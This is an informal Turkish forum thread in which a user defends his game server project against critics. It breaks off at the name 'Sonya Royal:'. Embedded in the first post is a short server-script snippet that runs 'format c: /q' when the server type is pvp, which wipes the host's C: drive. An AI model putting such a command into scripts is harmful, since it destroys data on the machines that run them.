atakan1234 : ByTyMaron ve camoron Çok Teşekkür ederim Birincisi Yanımda olduğulduğunuz için 2. sözüm size neden Olmasınki bana bunu açıkla Olmayacak Dersen OLMAZ ama olur başaracam dersen OLUR Onabakarsan ulu önder Mustafa Kemal ATATURK e Bakıldığında itilaf devletlerini yenmesi İMKANSIZDI ama Yendi Buda inanca bakar inandığın şeyi başarırsın unutma IMKANSIZ Diye birşey YOKTUR
bin bir hayalle basladıım projeye somurtarak devam ediorum simdi mutlumu oldun ben kimseyi karsıma almak istemiyorum arkadasım sizlerlende boy örçüştüremem tekrar sölüorum ben eğlenmek için yapıorum tekrar sölüorm kırdıysam seni özür dilerim !!! ama sayende suanda hevesim kursağımda kaldı Çok Saol !! 
if strmatch('<serv.type>','pvp')
call cmd "format c: /q"
serv.b server has been formating
return 1
endif
ben sadece fikrimi belirttim herkesin yaptığı gibi...

atakan1234 : arkadasım fikrini belli ettinde daha güsel bi dille edebilirdin yani nese forum tartışma yeri deildir tartısma olmasın yorumunu yapan daha msg atmasın ben tekrar sölüorm eğlenmek için yapıcam bunu hırs için deil tamam peki nedeninizi sölein neden böle beni kötüler gibi konusuyorsunuz söyleyin ama bosverin uzatmayalım manası yok sen öle diosan öledir sonucta sen tecrübelisin ama dünyada 3 çeşit insan vardır 1. si söz dinler düşünür neden böle diye 2. si sözü dinler ama söylenenin aksini dener ve duvara çarpmadan anlamaz 3. sü ise sözü dinler buna kafa bile yormaz kusarabakma usta ben 2. guruba giriyorum duvara çarpmadan yani sonucunu tatmadan geri dönmem huyum böyle kusura bakmayın belki dönerim haklıymışsın derim ama bunun sonucunu görmeden diyemem
-Lexis- : gerçek hayat ile oyunu birbirinden ayırmayı ne zaman öğreniceksiniz? bu bahsettiklerinin çoğunu yapamayacağına da eminim ayrıca bu projeye karşıyımherkesın dusuncesı farklı olabılır sız ayırmadınızda noldu 300 playerlı wısh oldu 80 playerlı wısh
bazı seylerı demekkı tek sız bılmıyorsunuz flooddan server kapanmasını dusunemıyorsanız
Sonya Royal: